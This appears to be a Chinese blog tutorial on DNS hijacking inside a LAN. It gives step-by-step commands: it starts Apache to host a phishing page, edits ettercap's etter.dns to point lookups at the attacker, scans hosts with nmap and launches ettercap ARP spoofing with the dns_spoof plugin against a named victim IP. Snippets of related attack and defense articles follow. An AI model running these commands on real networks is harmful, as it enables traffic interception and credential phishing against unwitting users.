内网渗透之dns劫持

最新推荐文章于 2026-05-11 19:06:42 发布
原创 最新推荐文章于 2026-05-11 19:06:42 发布 · 1.1k 阅读 · 7
标签
#安全
本文详细介绍了如何进行DNS劫持,通过Kali Linux和Ettercap工具,实现将目标主机的网络流量重定向到黑客的Apache2服务器上,以此进行钓鱼攻击。操作步骤包括启动Apache服务、制作钓鱼网页、修改ettercap DNS配置、扫描目标IP、发起ARP欺骗。此过程揭示了网络安全中DNS欺骗的潜在威胁。

DNS欺骗,被攻击的主机访问任意网站的回被转到特定的钓鱼网站,

实验工具:
kali linux 黑客机
win10 肉鸡
apache2
ettercap

操作步骤
1,打开kali上的apache2服务,
@kali:~# service apache2 start
root@kali:~# service apache2 status
绿点就是已经开启了。
在这里插入图片描述

2,制作网页,钓鱼网页不回做,就随便做了一个,命令如下
@kali:~#vim /var/www/html/index.html
在这里插入图片描述

3,修改ettercap DNS文件;
ot@kali:~# vim /etc/ettercap/etter.dns
A 192.168.1.112 (黑客机IP地址)
在这里插入图片描述

4,寻找目标IP
kali:~# nmap -sP 192.168.1.1-255

5,发起欺骗
kali:~# ettercap -i eth0 -T -P dns_spoof -M arp /192.168.1.132///
IP地址是被攻击的主机,

6,被攻击的主机访问任意网站的回被劫持,

最低0.47元/天 解锁文章
ARP欺骗实战:从流量劫持内网横向渗透
weixin_30455023的博客
05-22 673
ARP欺骗本质上是局域网中基于广播信任机制的地址映射劫持技术,其核心原理在于利用ARP协议‘无状态、无认证、先到先得’的特性,篡改目标主机的动态ARP缓存表,从而实现二层中间人位置。该技术不直接提权或执行代码,但为明文凭证捕获、NTLMv2哈希截获、HTTPS降级与DNS劫持等高价值操作提供底层通道,是内网横向移动的关键铺垫环节。在真实企业网络中,它常与LLMNR/NBT-NS投毒、SMB中继、证书伪造等技术协同使用,适用于红队演练、渗透测试及安全评估场景,尤其在未启用静态ARP绑定、SMB签名或DAI防护
Linux kali内网渗透DNS劫持+SET社会工程学进行内网钓鱼攻击
热门推荐
Pythonicc的博客
03-20 11万+
受害主机IP:192.168.20.236 攻击主机IP:192.168.20.164 网关:192.168.21.254 若攻击主机kali是虚拟机,需保证虚拟机的kali是桥接模式 收集信息阶段 获取到本机IP地址 ip address 获取到网关地址 route -n 获取内网同网段下正在联网的所有电脑IP地址 fping -g 192.168.20.0/23 实施攻击阶段 ...
定位内网中毒主机IP经历小记
weixin_30266829的博客
06-18 1164
一、事件起因 客户向公司反映使用IDS设备捕获到木马上线域名需要处理,虽然是逆向岗但还是有预感未来应急响应的工作只会越来越多。所以作为新人的我选择了跟带头BOSS去现场学习,并且将自己参与应急响应中的工作和思路进行记录。 二、前置知识 1)动态域名解析 用户每一次上网时运营商都会随机分配一个IP地址。安装在用户主机里的动态域名软件会把这个IP地址发送到动态域名解析服务器。Interne...
[渗透]网站劫持分析与验证方法总结
胖胖的ALEX
03-10 2968
网站劫持 网站劫持是指当用户打开一个网址的时候,出现一个不归属于网站范畴内的一个广告页面,或者是直接就跳转到某一个不是这个网站所属的页面。 网站劫持分为以下几大类: 一、搜索引擎劫持 搜索引擎劫持简称搜索劫持,其实就是从搜索引擎来的流量自动跳转到指定的网页。可以通过未经用户授权,自动修改第三方搜索引擎结果的软件实现,通常这类程序会在第三方搜索引擎的结果中添加自己的广告或加入网站链接获取流量等。 搜...
黑客技术—dns劫持
asdf8968的博客
11-07 1万+
目录 一、什么是DNS二、DNS原理三、什么是DNS劫持及危害四、DNS劫持方法五、如何防止DNS劫持(网络层面)六、如何防止DNS劫持(应用层面)七、历史著名劫持案例 检测网站是否被劫持  域名是否被墙  DNS污染检测  网站打开速度检测  网站是否被黑  被入侵  被改标题  被挂黑链     网站劫持检测  远程桌面连接软件    一、什么是DNS 在网络中,机器之间只认识I...
服务器遭黑客入侵导致网络流量异常的排查分析
专注于 机器学习 分布式计算
12-23 3740
服务器遭黑客入侵导致网络流量异常的排查分析   现象:下午14:00至16:00期间,网站后台编辑用户反馈CMS系统无法工作,响应极其缓慢.同一时间,就分应用也响应慢.网络与服务器架构分布:网站后台... 现象: 下午14:00至16:00期间,网站后台编辑用户反馈CMS系统无法工作,响应极其缓慢.同一时间,就分应用也响应慢. 网络与服务器架构分布:
DDOS流量攻击如何防御分析以及被攻击的解决方案
网站安全专家
06-10 1254
从2019年初到今天的6月,已经过来大半年了,DDOS流量攻击越来越频繁,在2月份的时候外部公开了一个新型的DDOS攻击网络,利用最新的漏洞,包括了微软最近新出的远程桌面漏洞的合集,利用这些漏洞组成了攻击网络。DDOS攻击的流量从几十G,到几百G不等,大学网站以及一些中小企业网站,也遭受到了僵尸网络的攻击。 据SINE安全从目前已知的流量攻击事件中获知,美国的大学网站受到攻击,共计遭受到了2...
【网安-Web渗透测试-内网渗透】局域网ARP攻击与DNS劫持
最新发布
qq_41158292的博客
05-11 447
通过 ARP 中间人欺骗配合 ettercap 的 dns_spoof 插件,目标机访问或 ping 百度域名时,域名解析结果被篡改,流量被劫持到攻击者指定的 192.168.179.31。
内网渗透之 arp欺骗-dns劫持-网站钓鱼
orange777
02-26 5832
环境信息 攻击机kali 192.168.10.124 靶机win7 192.168.10.229 arp欺骗 用到ettercap工具 1、启动ettercap -G 2、设置嗅探网卡,如eth0 扫描存活主机 将靶机192.168.10.229添加为目标1,网关192.168.10.1添加为目标2 进行arp欺骗 此时可以在靶机win7上看到kali的mac地址和网关mac地址一致,欺骗成功 dns劫持 1、编辑 Ettercap 的文件vim /etc/ettercap/etter.dn
基于内网dns劫持与网页挂马实测案例
qq_36585338的博客
11-26 2464
关于dns劫持与flush钓鱼挂马的一次真实案例复现,其中包括cs打枪神器的使用测试
内网渗透必备工具
m0_71744960的博客
04-21 1314
内网渗透必备工具
内网渗透DNS欺骗横向传播后门及控制
qq_28617309的博客
06-25 1783
内网渗透DNS欺骗横向传播后门及控制 by : blue_chocolate 未经作者授权禁止转载 摘要 “没有绝对安全的系统”伴随着科技发展,计算机广泛应用到社会事务和生活的各个方面,用户借助网络信息的共享性改变传统事务的处理方式,提高了工作效率,在带给人们快捷、方便的同时,也让社会面临着严峻的挑战,个人私密信息泄露、截获、篡改、伪造等各类网络安全问题层出不穷,威胁着个人的信息安全和社会的秩序稳定,使得我们在享受便利的同时,还要承受风险和威胁。 计算机犯罪案件逐年递增,计算机犯罪对.
内网渗透工具(1)
2401_84240129的博客
04-27 813
mt.exe 国内比较早的一个针对2k和2k3的渗透工具集hd.exe 早起国内某大神修改的mt的升级版,牛逼到爆nmapfscan foundstore 出品的比较早的命令行扫描工具,windows平台内网扫描必备metasploitnc.exe 做小范围端口扫描还是比较合适的。
Hook and Control技术揭秘:利用Singularity劫持浏览器渗透内网
gitblog_00655的博客
03-11 358
在网络安全领域,DNS重绑定攻击一直是绕过同源策略的强大技术。Singularity作为一款专业的DNS重绑定攻击框架,能够帮助安全研究者轻松实现浏览器劫持内网渗透。本文将深入解析Hook and Control技术的原理,展示如何利用Singularity框架实现对目标浏览器的完全控制,为内网安全测试提供全新思路。 ## 什么是DNS重绑定攻击? DNS重绑定攻击是一种巧妙的网络攻击技术,
网络安全渗透内网dns劫持——ettercap(三)此生无悔入华夏,男儿何不带吴钩
qq_25490573的博客
08-17 533
目录简介ettercap1.起一个钓鱼服务2.修改etterrcap配置3.简单操作 简介 略。。。 ettercap ettercap 是一款中间人攻击工具 它能够进行arp欺骗,dns劫持等常见的中间人攻击 1.起一个钓鱼服务 如果有现成的钓鱼服务可以用现成的,如果没有的话可以用系统的 首选修改/var/www/html下的index.html文件 这里随便写点内容 然后启动apache2服务 systemctl start apache2 打开浏览器可以看到 2.修改etterrcap配置 vi
网站渗透实战试验(仅供参考)
amaoatao的博客
03-10 5877
首先收集必要的信息 发现存在php探针,phpinfo,phpmyadmin 常用的垃圾弱口令登录失败。 尝试登录后台,网站使用帝国cms7.2系统 弱口令登录失败,使用网络上帝国cms的通用漏洞,行不通失败。 在知道绝对路径的情况下,dba权限的sql注入可以直接执行os-shell命令拿shell(下载帝国下来看!)。 扫描开放端口,反查域名,寻找最可能存在sql注入的网站。...
渗透测试成长篇-点击劫持漏洞
m0_51186260的博客
08-26 7148
1.前言 点击劫持就是一种视觉上的欺骗手段,攻击者使用一个透明的、不可见的iframe,覆盖在一个网页上,然后诱使用户在该网页上进行操作,此时用户在不知情的情况下点击了透明的iframe页面。通过调整iframe页面的位置,可以诱使用户恰好点击在iframe页面的一些功能性按钮上,攻击者常常配合社工手段完成攻击。(一般能被劫持就是网站缺少X-FRAME-OPTIONS) ************ 点击劫持一般在渗透测试中比较常见 2.过程 如何测试,有两种方法,今天就讲一种最简单常用的方式(bur.
【KALI网络安全DNS攻击(劫持和欺骗)与网络钓鱼的模拟和预防(1)
VMware, Windows, Linux, Cisco, Container, Kubernetes, Kali
03-20 5575
1、DNS概述 关于DNS的定义,作用,分类以及工作原理,我已经在【Windows Server 2019】DNS服务器的配置与管理——理论】这篇博客中陈述过。 要预防DNS劫持,必须了解它的攻击原理和过程 声明 本博客不是在向大家展示这些攻击的方法,而是让大家尽可能的了解DNS攻击的手段以及如何采取必要的预防措施,来确保更安全地上网。 2、DSN劫持DNS Hijacking)概述 2.1.什么是DNS劫持 DNS劫持全称为域名服务器劫持,又称DNS重定向(DNS redirection)。它是一种
Kali利用Ettercap实现中间人攻击之DNS劫持DNS欺骗)
m0_46745664的博客
08-11 5695
局域网内进行DNS劫持DNS欺骗)
DNS劫持
网络空间安全学习
07-25 3591
DNS劫持(Domain Name System hijacking)是黑客经常使用的一种攻击方式,其原理是通过篡改DNS系统的域名解析结果,将某个域名解析到指定的IP地址,从而使得用户访问该域名所对应的网站时,被重定向到攻击者控制的虚假网站,进而实现种种欺骗行为,如钓鱼、木马下载、恶意软件等。DNS劫持的核心原理就在于篡改域名解析结果,攻击者通过某种手段获取到通信链路上的DNS信息,然后将目标域名解析到他所想要的IP地址上,从而将用户引导到自己的虚假网站。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值